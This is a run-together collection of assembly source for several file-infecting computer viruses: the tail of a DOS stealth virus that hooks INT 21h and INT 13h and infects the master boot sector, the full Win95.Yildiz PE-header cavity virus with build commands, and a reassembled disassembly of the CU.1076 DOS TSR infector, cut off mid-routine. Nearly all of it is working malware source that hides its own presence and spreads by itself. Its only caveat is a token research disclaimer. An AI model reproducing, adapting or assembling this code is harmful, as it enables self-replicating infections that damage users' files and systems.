OR DX, DX ; They're attempting toJNZ JA_Chk_Body_Rd ; access the 1st 64k ?
CMP AX, 23 ; The header in particular?JA_Chk_Body_Rd : JA Chk_Body_Reach
POP AX ; Restore AX & CX.POP CXPUSH CXPUSH AX
CMP AH, 3Fh ; It is a read?JNE JMP_Cln_Handle ; Else it's a write.
MOV AX, CX ; AX = bytes to read.
ADD CX, File_Pos ; Calculate end offset after; the read.
JC Calc_Count_Hdr ; Above 64k ?
CMP CX, 24 ; Does the read touch theJB Sub_St_Size ; entire header?
Calc_Count_Hdr : MOV AX, 24 ; Calculate howmany bytesSUB AX, File_Pos ; to stealth in the header.
MOV New_Read_Count , AX ; Save the new read count.
Sub_St_Size : SUB Read_Count , AX ; The header will be read by; the virus, so adjust the; caller read count.
PUSH AX
MOV AX, 4200h ; Seek to the host's cleanMOV CX, Orig_Size +2 ; header. *** The caller'sMOV DX, Orig_Size ; header offset should beADD DX, OFFSET Host_Header ; added aswell, now it screwsADC CX, 0 ; up on header reads thatCALL Do_Old_Int21h ; don't start at offset 0.
POP CX ; CX = howmany bytes to; stealth in header.
PUSH BPMOV BP, SP
LDS DX, [ BP+( 3* 2)] ; Read buffer of the caller.
POP BP
MOV AH, 3Fh ; Read the clean headerCALL Do_Old_Int21h ; into the caller's buffer.
PUSH CSPOP DS
PUSH AXPUSH CX
ADD File_Pos , AX ; Update saved position.ADC File_Pos +2, 0
MOV DX, File_Pos ; Restore file position.MOV CX, File_Pos +2MOV AX, 4200hCALL Do_Old_Int21h
POP CX
POP AX
SUB CX, AX ; Not all bytes were read?JNZ Error_St_Exit ; Then bail.
CMP Read_Count , 0 ; No more bytes need to beJNZ Chk_Body_Reach ; read? Then IRET back.
POP CXPOP CX
MOV AX, CX ; AX = 0.
JZ Exit_Stealth_1
Error_St_Exit : POP DXPOP DX
Exit_Stealth_1 : POP DXPOP DS
JMP IRET_Flags
Chk_Body_Reach : POP AX ; Value of AX on entry.PUSH AX
MOV CX, File_Pos ; Original filepositionMOV DX, File_Pos +2 ; where the action starts.
CMP DX, Orig_Size +2 ; Below virus' 64k ?JB Calc_End_Pos
CMP CX, Orig_Size ; Below virus' code? If not,JBE Calc_End_Pos ; the virusbody gets read or
; overwritten, so stealth it.
CMP AH, 40h ; If it's a write then goJE Clean_Handle ; disinfect the handle.
POP AXPOP CX
XOR AX, AX ; Return 0 bytes read whenJZ Exit_Stealth_1 ; they try to read from after
; the original host.
Calc_End_Pos : ADD CX, Read_Count ; Calculate end positionADC DX, 0 ; after the read/write.
CMP DX, Orig_Size +2 ; Below the virusbody?JB Do_Function
CMP CX, Orig_SizeJBE Do_Function
CMP AH, 40h ; If it's a write thenJE Clean_Handle ; disinfect the handle.
MOV CX, Orig_SizeMOV DX, Orig_Size +2
SUB CX, File_PosSBB DX, File_Pos +2
OR DX, DX ; *** Obsolete instruction.JZ Set_New_Byte_C
MOV CX, - 1SUB CX, New_Read_Count
Set_New_Byte_C : MOV Read_Count , CX
Do_Function : POP AXPOP CXPOP DXPOP DSPUSH CX
PUSH AXPUSH DX
MOV CX, CS: Read_CountADD DX, CS: New_Read_CountCALL Do_Old_Int21h
ADD AX, CS: New_Read_Count
POP DXPOP CX
CMP CH, 3Fh ; It aint a read? Then it'sJE Exit_Stealth_2 ; a get/set filedate & time.
PUSH AXPUSH DX
MOV AX, 5700h ; Get file's date & time.CALL Do_Old_Int21h
INC AL ; AX = 5701h.OR CL, ( 62/ 2) ; Set 60 seconds.
DEC CXCALL Do_Old_Int21h
POP DXPOP AX
Exit_Stealth_2 : POP CXJMP IRET_Flags
Clean_Handle :MOV WORDPTR Valid_Handle , 0001hMOV File_Handle , BL
MOV AX, 4200h ; Seek to the old header.MOV CX, Orig_Size +2MOV DX, Orig_SizeADD DX, OFFSET Host_HeaderADC CX, 0CALL Do_Old_Int21h
MOV AH, 3Fh ; Read it in.MOV CX, 24MOV DX, OFFSET Buffer
NOPCALL Do_Old_Int21h
MOV AX, 4200h ; Seek to the old EOF.MOV DX, Orig_SizeMOV CX, Orig_Size +2CALL Do_Old_Int21h
MOV AH, 40h ; Write new EOF marker.XOR CX, CXCALL Do_Old_Int21h
MOV AX, 4200h ; Seek to BOF.XOR CX, CXXOR DX, DXCALL Do_Old_Int21h
MOV AH, 40h ; Restore old header.MOV CX, 24MOV DX, OFFSET Buffer
NOPCALL Do_Old_Int21h
MOV AX, 4200h ; Restore original file pos.MOV DX, File_PosMOV CX, File_Pos +2CALL Do_Old_Int21h
POP AXPOP CXPOP DXPOP DS
JMP SHORTJMP_Old_Int21h
Check_Win_Exit :POP BX ; Remove return IP off stack.POP CX ; POP program's return CS.
PUSH CXPUSH BXPUSH AX
DEC CX ; Get program's MCB.MOV DS, CX
MOV SI , 8 ; SI = name of terminating; program.
CLD ; Fetch 1st word of filename.LODSWXCHG BX, AX
LODSW ; Fetch 2nd word of filename.XCHG DX, AX
POP AX
CMP BX, 'IW' ; Is it WIN.COM that'sJNE J2_J_Old_i21h ; terminating?
CMP DX, 'N'JNE J2_J_Old_i21h
DEC CS: Windows_Active ; If so, reset the flag.
J2_J_Old_i21h : JMP SHORTJMP_Old_Int21h
Stealth_Seconds :PUSH AXPUSH CXPUSH DX
MOV AX, 5700h ; Get file's date & time.CALL Do_Old_Int21h
PUSH AXPUSH CX
CALL Check_60_Secs ; Check if it's infected.
POP CXPOP AX
POP DXPOP CXPOP AX
JNE JMP_Old_Int21h ; If it ain't then get out.
OR AL, AL ; Get file date & time?JNZ Stealth_Set ; Else it's a set.
CALL Do_Old_Int21h ; Do the call.
AND CL, 11100000b ; Clear seconds.JMP IRET_Flags
Stealth_Set : OR CL, ( 62/ 2) ; Set 60 seconds.DEC CX
JNZ JMP_Old_Int21h ; This jump is always taken.
Do_Old_Int21h : PUSHF ; Simulate an interrupt 21h.CALL DWORDPTR CS: Old_Int21h
RETN
JMP_Old_Int21h : JMP DWORDPTR CS: Old_Int21h
Host_Header : DB 0CDh, 20hDB 22 DUP ( 0)
; This ISR stealths the first INT 12h and then unho oks itself, this way; MEM and CHKDSK will report the untouched total DO S memory size.New_Int12h :
PUSH DSPUSH ESPUSH BX
XOR AX, AX ; DS = IVT.MOV DS, AX
LES BX, DWORDPTR CS: Old_Int12h
CLI ; Restore original INT 12h.
MOV DS:[( 12h* 4)], BXMOV DS:[( 12h* 4)+ 2], ESSTI
POP BXPOP ESPOP DS
INT 12h ; Do the original INT 12h.
ADD AX, Virus_Size_1024 ; Stealth DOS memory size.
IRET
DB '10/23/92' , 0Origin = BYTE PTR $- 1
File_Int21h :CMP AX, 0EEE7h ; Residency check?JE Return_ID_2
CMP AX, 3513h ; Get INT 13h ?JE Get_Int13h_St
CMP AX, 3521h ; Get INT 21h ?JE Get_Int21h_St
CMP AX, 2513h ; Set INT 13h ?JE Set_Int13h_St
CMP AX, 2521h ; Set INT 21h ?JE Set_Int21h_St
JMP DWORDPTR CS: 600h +( Old_Int21h - File_Int21h )
Return_ID_2 : MOV AX, 0D703h ; Return ID word to caller.IRET
Get_Int13h_St : LES BX, DWORDPTR CS: 600h +( Old_Int13h - File_Int21h )IRET
Get_Int21h_St : LES BX, DWORDPTR CS: 600h +( Old_Int21h - File_Int21h )IRET
Set_Int13h_St : MOV CS: 600h +( Old_Int13h - File_Int21h ), DXMOV CS: 600h +( Old_Int13h - File_Int21h )+ 2, DSIRET
Set_Int21h_St : MOV CS:[ 600h +( Old_Int21h - File_Int21h )], DXMOV CS:[ 600h +( Old_Int21h - File_Int21h )+ 2], DSIRET
Act_Partition DW 0
Boot_Int13h :CMP DX, 80h ; 1st HD - head zero?JNE JMP_Boot_i13h
CMP CX, Virus_Size_512 +2 ; Operation concerns theJNB JMP_Boot_i13h ; MBS or virussectors?
CMP AH, 02h ; Sector read?JE Check_For_MBS
CMP AH, 03h ; Sector write?JE Check_For_MBS
JMP_Boot_i13h : JMP DWORDPTR CS:[ 0000h ] ; Jump to the previous ISR.Ofs_Old_Int13h = WORDPTR $- 2
Check_For_MBS : CMP CX, 1 ; It's the MBS ?JNE Check_If_Write
CMP AH, 02h ; It is a MBS read?JE Do_Read_Write ; Else it's a write.
PUSH SI
CALL Get_Act_Partition ; Get delta offset to active; partition.
MOV ES:[ BX+SI ], 0200h ; Set the infected partition; in the MBS so the written; MBS will still be infected.
POP SI
Do_Read_Write : PUSH AX
MOV AL, 1 ; Only read/write to the MBS.
PUSHF ; Carry out the read/write.CALL DWORDPTR CS:[ 0]
Ofs_Real_Int13h = WORDPTR $- 2
POP AX
CMP AH, 03h ; It was a write?JE Success_IRET
PUSH SI ; Else stealth the read.
CALL Get_Act_Partition
MOV ES:[ BX+SI ], 0101h ; Put back the original; MS-DOS partition start.
POP SI
CMP AL, 1JE Success_IRET
Check_If_Write : CMP AH, 03h ; It was a write?JE Success_IRET
PUSH AXPUSH CXPUSH DXPUSH DI
XOR AH, AH
MOV DI , BX ; ES:DI = readbuffer.
CMP CX, 1MOV CX, 512
JNE Calc_Sec_Size
DEC AX ; Skip the MBS.ADD DI , CX ; Next sector.
Calc_Sec_Size : MUL CX ; Sectorcount * 512.
OR DX, DXJZ Clear_Buffer
MOV CX, 0
Clear_Buffer : XCHG CX, AX
CLD
Clear_Byte : STOSBLOOP Clear_Byte
POP DIPOP DXPOP CXPOP AX
Success_IRET : CLC ; Mark success. *** The next; XOR clears CF already.
XOR AH, AH
IRET_Flags : PUSH AXLAHF
PUSH BPMOV BP, SP
MOV [ BP+( 4* 2)], AH ; Set new flags in stack.
POP BPPOP AX
IRET
; Get's the active partition.Get_Act_Partition :
CALL Get_Delta_2Get_Delta_2 : POP SI
SUB SI , OFFSET Get_Delta_2
MOV SI , CS:[ SI +Act_Partition ]
RETNEnd_Body :
Old_Int08h = WORDPTR $+0Old_Int21h = WORDPTR $+4Old_Int01h = WORDPTR $+8Old_Int12h = WORDPTR $+8Old_Int13h = WORDPTR $+12Real_Int13h = WORDPTR $+16Buffer = $+20Read_Count = WORDPTR $+44Host_Size = WORDPTR $+44
New_Read_Count = WORDPTR $+46File_Pos = WORDPTR $+48Host_Type = BYTE PTR $+49Orig_Size = WORDPTR $+52Valid_Handle = BYTE PTR $+56File_Handle = BYTE PTR $+57
EXE_Header STRUCEXE_ID DW 0Image_Mod_512 DW 0File_512_Pages DW 0Reloc_Items DW 0Header_Size DW 0Min_Size_Mem DW 0Max_Size_Mem DW 0Program_SS DW 0Program_SP DW 0Checksum DW 0Program_IP DW 0Program_CS DW 0Reloc_Table DW 0EXE_Header ENDS
Find_FN_FCB STRUCFCB_Drive DB 0FCB_Name DB 8 DUP( 0)FCB_Ext DB 3 DUP( 0)FCB_Attr DB 0FCB_Reserved DB 10 DUP( 0)FCB_Time DW 0FCB_Date DW 0FCB_Start_Clust DW 0FCB_Size DW 0, 0Find_FN_FCB ENDS
END START
; ************************************************* ************************; ******************** ********************; ******************** Win95.Yildiz ********************; ******************** by ********************; ******************** Black Jack ********************; ******************** ********************; ************************************************* ************************;;;NAME: Win95.Yildiz;AUTHOR: Black Jack [independant Austrian Win32asm virus coder];CONTACT: [email protected] | http://www.co derz.net/blackjack;TYPE: Win9x direct acting/global ring3 resident PE header cavity virus;SIZE: 323 bytes (but of course infected files won' t increase in size);;DESCRIPTION: When an infected file is run, the vir us takes control. It then; tries to find the kernel32 base addre ss by a simple algorithm; which should make it compatible with Win9X and WinME (although I; haven't tested it with the second one ). After that it gets the; undocumented Win9X API VxDCall0 and u ses it to call int 21h. The; VxDCall0 API is the very first export ed API in Win9X; I don't; know which API is first in WinNT, tha t's why unpredictable; results may occur when the virus runs in that OS (I haven't tried; it out, but of course the virus can't work in NT).; Then it goes TSR (read more about thi s a bit later), and infects; all PE EXE files in the current direc tory by overwriting the; unused padding bytes in the PE header with the virus body.; The memory residency consist in infec ting kernel32.dll in memory.; To do so, it creates a temporary file called "Yildiz." and writes; the first 4KB of kernel32.dll there. Then this file is infected; like any other PE file. And finally t he content of the infected; temp file is read back into kernel32 memory. Yep, you have read; right, by using the int21h with VxDCa ll0 you can read from a file; into read-only memory! (This trick wa s discovered by Murkry/IkX,; read more about it in the comments to his Darkside virus source,; published in Xine#3).; As I have already said, the kernel32 is infected in memory just; like any other file, this means the e ntry point is set to the; virus, no APIs are hooked. As you sho uld know, the entry point; of a DLL is a init routine that is ca lled whenever the DLL is; loaded by a program. And since kernel 32 is imported by all; programs, this means for us that when ever a program is run (and; kernel32 is mapped into the program's address space), our virus; will infect all PE EXE files in the d irectory of the program.;;ASSEMBLE WITH: ; tasm32 /mx /m yildiz.asm; tlink32 /Tpe /aa yildiz.obj,,, imp ort32.lib;; there's no need for PEWRSEC or a s imilar tool, because the; virus code is supposed to run in r ead-only memory anyways.;;DISCLAIMER: I do *NOT* support the spreading of vi ruses in the wild.; Therefore, this source was only writte n for research and; education. Please do not spread it. Th e author can't be hold; responsible for what you decide to do with this source.; ================================================= ==========================
virus_size EQU ( virus_end - virus_start )
Extrn MessageBoxA : Proc ; for first generation onlyExtrn ExitProcess : Proc
.386p
.model flat
.datadd 0 ; dummy data, you know...
.codevirus_start :
pushad ; save all registers
xchg edi , eax ; put delta offset to EDI (EAX=start; offset of program by default)
mov eax , [ esp +8* 4] ; EAX=some address inside kernel32
sub esp , size stack_frame ; reserve room on stackmov esi , esp ; set ESI to our data on the stack
search_kernel32 :xor ax , ax ; we assume the least significant
; word of the kernel32 base is zerocmp word ptr [ eax ], "ZM" ; is there a MZ header ?JE found_kernel32 ; if yes, we found the correct
; kernel32 base addressdec eax ; 0BFF80000->0BFF7FFFF, and then the
; least significant word is zeroedJMP search_kernel32 ; check next possible kernel32 base
tmp_filename db "Yildiz" , 0filespec db "*.EXE" , 0
found_kernel32 :mov ebx , [ eax +3Ch] ; EBX=kernel32 PE header RVAadd ebx , eax ; EBX=offset of kernel32 PE header
mov ebx , [ ebx +120 ] ; EBX=export table RVAmov ebx , [ ebx +eax +1Ch] ; EBX=Address array of API RVAsmov ebx , [ ebx +eax ] ; get the first API RVA: VxDCall0add ebx , eax ; EBX=Offset VxDCall0 APImov [ esi.VxDCall0 ], ebx ; save itlea ebp , [ edi +int21h - virus_start ] ; EBP=offset of our int21h procedure
; for optimisation reasons, the; CALL EBP instruction is just 2 bytes
; ----- GO TSR ------------------------------------ --------------------------
lea edx , [ edi +tmp_filename - virus_start ] ; EDX=pointer to tmp filenamepush edx ; save it on stack
push eax ; save kernel32 base address on stack
mov ah, 3Ch ; create temp filexor ecx , ecx ; no attributescall ebp ; call our int 21h procedure
xchg ebx , eax ; filehandle to EBX, where it belongs
pop edx ; EDX=kernel32 base addresspush edx ; save it again
call write_file ; write start of kernel32 to temp file
call infect ; infect the temp file
pop edx ; EDX=kernel32 base address
mov ah, 3Fh ; read infected kernel32 fileststartcall read_write ; into kernel32 memory
mov ah, 3Eh ; close temp filecall ebp ; call our int 21h procedure
pop edx ; EDX=pointer to temp filenamemov ah, 41h ; delete temp filecall ebp ; call our int 21h procedure
; ----- INFECT ALL FILES IN CURRENT DIR ----------- --------------------------
mov ah, 2Fh ; get DTAcall ebp ; call our int 21h procedure
push es ; save DTA address to stackpush ebx
push ds ; ES=DS (standart data segment)pop es
mov ah, 1Ah ; set DTA to our data arealea edx , [ esi.dta ] ; DS:EDX=new DTA adresscall ebp ; call our int 21h procedure
mov ah, 4Eh ; find first filexor ecx , ecx ; only files with standart attributeslea edx , [ edi +( filespec - virus_start )] ; EDX=offset of filespec
findfile_loop :call ebp ; call our int 21h procedureJC all_done ; no more files found?
mov ax , 3D02h ; open victim file for read and writelea edx , [ esi.dta +1Eh] ; DS:EDX=pointer to filename in DTAcall ebp ; call our int 21h procedure
xchg ebx , eax ; handle to EBX, where it belongs
call infect ; infect the file
mov ah, 3Eh ; close the victim filecall ebp ; call our int 21h procedure
search_on :mov ah, 4Fh ; find next fileJMP findfile_loop
; ----- RESTORE HOST ------------------------------ --------------------------
all_done :pop edx ; restore old DTA offset in DS:EDXpop dsmov ah, 1Ah ; reset DTA to old addresscall ebp ; call our int 21h procedure
push es ; DS=ES (standart data segment)pop ds
add esp , size stack_frame ; remove our data buffer from stack
popad ; restore all registers
db 05h ; add eax, imm32entry_RVA_difference dd ( host - virus_start ) ; difference between host and
; virus entrypoint (EAX is virus; entrypoint offset by default)
JMP eax ; jump to host entrypoint
; ----- END MAIN PART OF THE VIRUS CODE ----------- --------------------------
exit_infect :pop edi ; restore EDI (delta offset)RET ; return to caller
; ----- INFECT AN OPENED FILE (HANDLE IN BX) ------ --------------------------
infect :push edi ; save EDI (delta offset)
mov edx , esi ; EDX=read/write buffer offsetmov ah, 3Fh ; read start of filecall read_write
cmp word ptr [ esi ], "ZM" ; is it an exe file ?JNE exit_infect ; cancel infection if not
mov ecx , [ esi +3Ch] ; ECX=new header RVAcmp ecx , 3* 1024 ; check if DOS stub is small enough
; so that all the PE header is in; our buffer
JA exit_infect ; if not, cancel infection
lea edi , [ esi +ecx ] ; EDI=PE header offset in memorycmp word ptr [ edi ], "EP" ; is it an PE file ?
; (I know that the PE marker is; actually a dword, but by only; checking one word we save a byte; of virus code)
JNE exit_infect ; cancel infection if not
cmp dword ptr [ edi +28h ], 4096 ; check if entrypoint RVA is in the; first 4 KB of the file
JB exit_infect ; if yes, the file must be already; infected, cancel infection
add ecx , 24 ; add size of FileHeadermovzx eax , word ptr [ edi +14h ] ; EAX=size of Optional headeradd ecx , eax ; add it to ECXmovzx eax , word ptr [ edi +6] ; EAX=NumberOfSectionsimul eax , eax , 40 ; get size of section headers to EAXadd ecx , eax ; add it to ECX, now it points to the
; end of the used part of the PE; header, where the virus will be.
mov edx , ecx ; EDX=virus RVAxchg dword ptr [ edi +28h ], edx ; set it as new entrypoint RVAsub edx , ecx ; EDX=difference between old and new
; entrypoint RVA
mov eax , [ edi +54h ] ; EAX=SizeOfHeaders (aligned to; FileAlign)
lea edi , [ esi +ecx ] ; EDI=virus offset in buffer
sub eax , ecx ; EAX=free room for us to usemov cx , virus_size ; ECX=size of virus (the most
; significant word of ECX should be 0)cmp eax , ecx ; enough room for the virus ?JL exit_infect ; cancel infection if not
pop eax ; EAX=delta offsetpush eax ; save it again to stackxchg esi , eax ; ESI=delta offset, EAX=data buffer
cld ; clear direction flagrep movsb ; move virus body into buffer
xchg esi , eax ; ESI=pointer to our data on stack
mov [ edi -( virus_end - entry_RVA_difference )], edx ; store difference; between old and new entrypoint
pop edi ; restore EDI (delta offset)
mov edx , esi ; EDX=offset of read/write buffer
; now write modified start of file,; then return to caller
write_file :mov ah, 40h ; write to file
read_write :xor ecx , ecx ; ECX=0pushad ; save all registers
xor eax , eax ; EAX=4200h (set filepointer frommov ah, 42h ; start of the filecdq ; CX:DX=0 (new filepointer)call ebp ; call our int 21h procedure
popad ; restore all registers
mov ch , 10h ; ECX=4096 (size of read/write buffer)
; now execute int 21h and return
int21h : ; protected mode int21push ecx ; push parameterspush eaxpush 2A0010h ; VWIN32_Int21Dispatch functioncall ss :[ esi.VxDCall0 ] ; call VxDCall0 APIret
virus_end :
; This is our data that will be stored on the stack :
stack_frame strucbuffer db 4096 dup (?)dta db 43 dup (?)
VxDCall0 dd ?stack_frame ends
host :push 0push offset captionpush offset messagepush 0call MessageBoxA
push 0call ExitProcess
caption db "Win95.Yildiz Virus (c) 2000 Black Jack" , 0message db "first generation dropper" , 0
end virus_start
comment \
Name : CU.1076 ( according to AVP , obviously named after infection: marker in CRC field of EXE header.
Author : ?Type : TSR EXE/ COM infector with sizestealthSize : 1076 bytesOrigin : ?When : ?Status : ?Disassembled by : Black Jack
Description :When an infected file is executed , the virus gains control and goes TSR bythe standart MCB method and hooks int21h. It then infects COM and EXE fileswhen they are executed or loaded by function 4Bh. The infection process is100% standart. Date , Time and Attributes are stored ( except that the secondsfiled holds the infection mark 60), and a dummy int24h is installed duringinfection. Also , the virus uses size stealth for FCB ( functions 11h , 12h )handle ( functions 4Eh, 4Fh) and Win95 ( functions 714Eh, 714Fh ), althoughthe handle stealth won 't work because of lots of bugs. Also it has a kindof time - stealth , on the get time function ( 5700h ) it returns the secondsfield of the last infected file to hide its infection mark.
Comments:This is just a stupid and boring DOS virus , I just disassembled it becauseof great boredom and because I had found an infected file on my mothers PC( but please don 't ask me how it came there). Its full of bugs and rubbish.
Reassembly tested with Tasm 3.1 and TLink 3.0 .
TASM / M cuTLINK / t cu
\
virus_size = ( v_end - v_start )
.model tiny
.286
.codeorg 100hstart :
nop ; dummy hostnopnop
v_start :push es ; save PSP segment
call next ; calculate delta offsetnext :
pop bpsub bp, offset next ; BP=delta offset
mov ax , 1818h ; already resident?int 21hcmp bx , 0C001hje already_resident ; yes, we're there
mov ax , ds ; AX=PSP segment
dec ax ; AX=MCB segmentmov ds , ax ; DS=MCB segment
mov cl , "M" ; marker: not the last MCBxchg ds :[ 0], cl ; mark our MCB as not the lastsub word ptr ds :[ 3], 40h ; resize MCBsub word ptr ds :[ 12h ], 40h ; end segment of this programmov bx , ds :[ 12h ] ; BX=segment of new virus MCBmov ds , bx ; DS=segment of new virus MCBinc bx ; BX=segment of the virusmov es , bx ; ES=segment of the virusmov ds :[ 0], cl ; marker of virus MCBmov word ptr ds :[ 1], 8 ; mark as system MCBmov word ptr ds :[ 3], 3Fh ; set virus segment size in MCB
push cs ; DS=CSpop dsxor di , di ; DI=0lea si ,[ bp+v_start ] ; SI=start of virus codemov cx , virus_size ; CX=size of viruscld ; clear direction flagrep movsb ; copy virus to TSR location
push es ; save virus segment
push es ; DS=ES=virus segmentpop ds
mov ax , 3521h ; get int21h vectorint 21h
mov ds :[ int21h_offset - v_start ], bx ; save itmov ds :[ int21h_segment - v_start ], es
pop es ; ES=virus segment
mov ax , 2521h ; set new int21h vectormov dx ,( int21h_handler - v_start ) ; DS:DX=new int handler
int 21h
already_resident :pop es ; ES=PSP segmentpush cs ; DS=CSpop ds
cmp cs :[ bp+host_type ], "XE" ; is host an EXE?je restore_exe
restore_com :lea si ,[ bp+header ] ; original first bytes of hostmov di , 100h
cld ; clear direction flagmovsw ; move start of host backmovsb
push es ; DS=ES=PSP segmentpop dspush 100h ; jump to host startret
restore_exe :mov ax , es ; AX=ES=PSP segmentadd ax , 10h ; AX=start segment of imagepush es ; DS=ES=PSP segmentpop ds
add word ptr cs :[ bp+host_cs ], ax ; relocate jump to hostadd ax ,word ptr cs :[ bp+host_ss ] ; relocate host SSmov ss , ax ; restore host SSmov sp ,word ptr cs :[ bp+host_sp ] ; restore host SP
db 0EAh ; jmp far opcodehost_ip dw ?host_cs dw ?
host_ss dw ?host_sp dw ?
int21h_handler :cmp ax , 1818h ; residency checkjne no_residency_checkmov bx , 0C001h ; we're already installediret ; quit interrupt execution
no_residency_check :cmp ah, 4Bh ; load/execute filejne no_execjmp infect
no_exec :cmp ah, 11h ; FCB find first file?je fcb_stealthcmp ah, 12h ; FCB find next file?je fcb_stealth
cmp ah, 4Eh ; handle find first file?jne no_findfirst_handlejmp handle_stealth
no_findfirst_handle :cmp ah, 4Fh ; handle find next file?jne no_findnext_handlejmp short handle_stealth
nopno_findnext_handle :
cmp ax , 714Eh ; LFN find first file?jb no_LFN_stealthcmp ax , 714Fh ; LFN find next file?ja no_LFN_stealthjmp LFN_stealth
no_LFN_stealth :cmp ax , 5700h ; get file date/time?
jne org_int21h ; Jump if not equaljmp time_stealth
org_int21h :db 0EAh
int21h_pointer equ this dwordint21h_offset dw ?int21h_segment dw ?
; ----- FCB STEALTH ------------------------------- --------------------------fcb_stealth :
pushf ; simulate int21h callcall dword ptr cs :[ int21h_pointer - v_start ]
pushf ; save flags
pusha ; save all regspush ds ; save segments
push es
or al , al ; FCB search failed?jnz exit_fcb_stealth ; if so, quit stealth routine
mov ah, 51h ; get active PSP segment to BXint 21h
mov es , bx ; ES=active PSP segmentcmp bx , es :[ 16h ] ; is it COMMAND.COM calling?jne exit_fcb_stealth ; if not, don't do stealth
mov ah, 2Fh ; get DTA to ES:BXint 21h
push es ; DS:BX=DTApop ds
cwd ; DX=0
cmp byte ptr [ bx ], 0FFh ; is it an extended FCB?jne no_extended_fcbadd bx , 7 ; convert to regular FCB
no_extended_fcb :mov cl ,[ bx +17h ] ; CL=low byte of filetimeand cl , 00011111b ; CL=secondscmp cl , 1Dh ; seconds=60 means infectedjne exit_fcb_stealth ; if not, then exit stealth routine
mov ax ,[ bx +9] ; AX:CL=file extensionmov cl ,[ bx +1Bh]
cmp ax , "OC" ; is it a COM file?jne fcb_stealth_no_comcmp cl , "M"jne exit_fcb_stealth ; its not an EXE/COMjmp short do_fcb_stealthnop
fcb_stealth_no_com :cmp ax , "XE" ; is it an EXE file?jne exit_fcb_stealth ; its not an EXE/COMcmp al , "E"jne exit_fcb_stealth ; its not an EXE/COM
do_fcb_stealth :sub word ptr [ bx +1Dh], virus_size ; stealth filesizesbb word ptr [ bx +1Ch], 0 ; stealth filesize
exit_fcb_stealth :pop es ; restore setment registers
pop dspopa ; restore all regspopf ; restore flagsretf 2 ; return from INT and keep the flags
; ----- HANDLE STEALTH ---------------------------- --------------------------; note: this routine is much to buggy to work.
handle_stealth :pushf ; push flagscall dword ptr cs :[ int21h_pointer - v_start ]jc findfirstnext_failed
pushf ; save flagspusha ; save all registerspush ds ; save segment registers
push espush di ; save DI (useless)
mov ah, 2Fh ; get DTA to ES:BXint 21h
; BUG! DS should be set to ES here!!!
mov cl ,[ bx +16h ] ; CL=low byte of filetimeand cl , 00011111b ; CL=seconds of filetimecmp cl , 1Dh ; seconds=60 means infectedjne exit_handle_stealth
push si ; save SI (useless)lea si ,[ bx +1Eh] ; ES:SI=filenamecall get_extension ; get file extension to AX:CLpop si ; restore SI
cmp ax , "OC" ; could it be a COM file?jne handle_stealth_no_com ; check for an EXEcmp cl , "M" ; really a COM?jne exit_handle_stealth ; if not, exit stealth routinejmp short do_handle_stealthnop
handle_stealth_no_com :cmp ax , "XE" ; could it be an EXE file?jne exit_handle_stealth ; no EXE/COM, leave stealth routinecmp cl , "E" ; really an EXE?jne exit_handle_stealth ; no EXE/COM, leave stealth routine
do_handle_stealth :sub word ptr es :[ bx +1Ah], virus_size ; fixup filesize
; BUG! hiword of filesize unchanged!!!
exit_handle_stealth :pop di ; restore DIpop es ; restore segment registerspop dspopa ; restore all registerspopf ; restore flags
findfirstnext_failed :retf 2 ; return from INT and keep the flags
; ----- LONG FILENAME (WIN95) STEALTH ------------- --------------------------LFN_stealth :
pushf ; simulate int21h callcall dword ptr cs :[ int21h_pointer - v_start ]
; ES:DI=finddata structure
pushf ; save flagspusha ; save all regspush ds ; save segments
push es
jc exit_lfn_stealth ; exit on errornop
nop
push es ; DS=ESpop ds
mov ax , si ; SI=DateTimeFormatcmp ax , 1 ; 1 means DOS format for date/timeje dos_datetime_format
nopnop
mov ax , 71A7h ; convert date/time formatxor bl , bl ; BL=0: Win95 format to DOS formatmov si , diadd si , 14h ; DS:SI=ptr to filetimepushf ; simulate int21h call
call dword ptr cs :[ int21h_pointer - v_start ]; return CX=filetime, DX=filedate
jmp short filetime_in_CXnop ; stupid single-pass assembler
dos_datetime_format :mov cx , es :[ di +14h ] ; get filetime in CX
filetime_in_CX :and cl , 00011111b ; CL=file secondscmp cl , 1Dh ; seconds=60 means infectedjne exit_lfn_stealth ; if not, exit stealth routine
nopnop
push si ; save SI (useless)lea si ,[ di +2Ch] ; DS:SI=filename ptrcall get_extension ; get filename extension to AX:CLpop si ; restore SI
cmp ax , "OC" ; could it be a COM file?jne lfn_stealth_no_com ; not a COM
nopnop
cmp cl , "M" ; really a COM?jne exit_lfn_stealth ; no COM/EXE, leave stealth routine
nopnop
jmp short do_lfn_stealthnop
lfn_stealth_no_com :cmp ax , "XE" ; could it be an EXE file?jne exit_lfn_stealth ; if not, leave stealth routine.
nopnop
cmp cl , "E" ; is it really an EXE?jne exit_lfn_stealth ; no COM/EXE, leave stealth routine
nopnop
do_lfn_stealth :sub word ptr es :[ di +20h ], virus_size ; fixup filesize
sbb word ptr es :[ di +22h ], 0
exit_lfn_stealth :pop es ; restore segment registers
pop dspopa ; restore all registerspopf ; restore flagsretf 2 ; return from INT and keep the flags
; ----- GET THE FILE EXTENSION -------------------- --------------------------get_extension :
lodsb ; get a char from filenamecmp al , "." ; end of filename?jne get_extension ; if not, search on
cld ; clear direction - useless herelodsw ; get first 2 bytes of extension to AXxchg cx , ax ; move them to CXcld ; clear direction - useless againlodsb ; get last byte of extension to ALxchg cx , ax ; AX:CL=file extensionret
; ----- TIME STEALTH ------------------------------ --------------------------time_stealth :
pushf ; Push flagscall dword ptr cs :[ int21h_pointer - v_start ]
pushf ; save flagspusha ; save all registerspush ds ; save segment registers
push es
and cl , 00011111b ; CL=seconds of filetimecmp cl , 1Dh ; seconds=60 means infectedjne no_time_stealthand cx , 11100000b ; clear seconds of filetimeadd cl ,byte ptr cs :[ seconds - v_start ] ; set new seconds field
no_time_stealth :pop es ; restore segment registers
pop dspopa ; restore all registerspopf ; restore flagsretf 2 ; return from INT and keep the flags
; ----- INFECTION --------------------------------- --------------------------infect :
pusha ; save all registerspush ds ; save also segment registerspush es
push ds ; save DS (segm to filename)xor ax , ax ; AX=0mov ds , ax ; DS=AX=0=IVT segment
mov ax , offset int24h_handler ; BUG! forgotten to sub v_startmov bx , cs ; BX:AX=ptr32 to int24h handlercli ; disable interruptsxchg ds :[ 24h* 4], ax ; set new handler to int24hxchg ds :[ 24h* 4+2], bxmov word ptr cs :[ int24h_offset - v_start ], ax ; save oldmov word ptr cs :[ int24h_segment - v_start ], bx ; handlersti ; enable interruptspop ds ; restore DS (filename segm)
mov ax , 4300h ; get attributes of victimint 21h
push dx ; save filename pointer ofpush ds ; victim file
push cx ; save attributes of victim
